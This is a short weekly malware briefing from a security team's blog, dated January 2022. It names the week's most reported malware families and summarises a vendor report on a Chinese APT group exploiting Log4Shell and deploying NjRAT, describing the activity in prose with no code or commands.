Briefing Malware
BLOG CERT SOGETI ESEC
CERT BRIEFING MALWARE

Briefing Malware - 04/01/2022

4th of January 2022 - Winners of the 1st week : Redline, NjRAT and AsyncRAT.

Some links points at extended actionnable intelligence (Threat Bulletins, TTPs, signatures, etc) on our Threat Intelligence Platform Anomali. This access is limited to our clients.

 

Threat statistics report

Publication date:

04/01/2022

Distribution :

TLP : WHITE  

What's new?

NjRAT (ID Mitre: S0385)

Crowdstrike Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt

Since the discovery of Log4Shell vulnerabilities (#CVE-2021-44228, #CVE-2021-45105) in December 2021, all cyber security teams are dealing with multiple threats starting with the exploitation of those ones. In this context, #Crowstrike Falcon OverWatch claims to have disrupted a recent malware campaign based on an early detect of the exploitation attempt through a vulnerable #Apache Tomcat process. The attacker tried to execute suspicious Linux commands before connect to an infrastructure managed by a poorly known threat actor dubbed #Aquatic Panda. Overwatch has observed through investigation that #Aquatic Panda tried to figure out after downloading several scripts from remote, then they tried to understand and harvested information about the server such as credentials, system or domain information.

#Aquatic Panda is a Chinese Advanced Persistent Threat (#APT) with intelligence gathering and industrial espionage missions first spotted around May 2020. They heavily relied on Cobalt Strike as well as unique tools like a famous Cobalt Strike downloader, #FishMaster. They have been observed dropping #NjRAT, a remote access trojan (#RAT) which has information gathering or process/registry manipulation capabilities.

 

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

 

Download the report

 

 

Print Email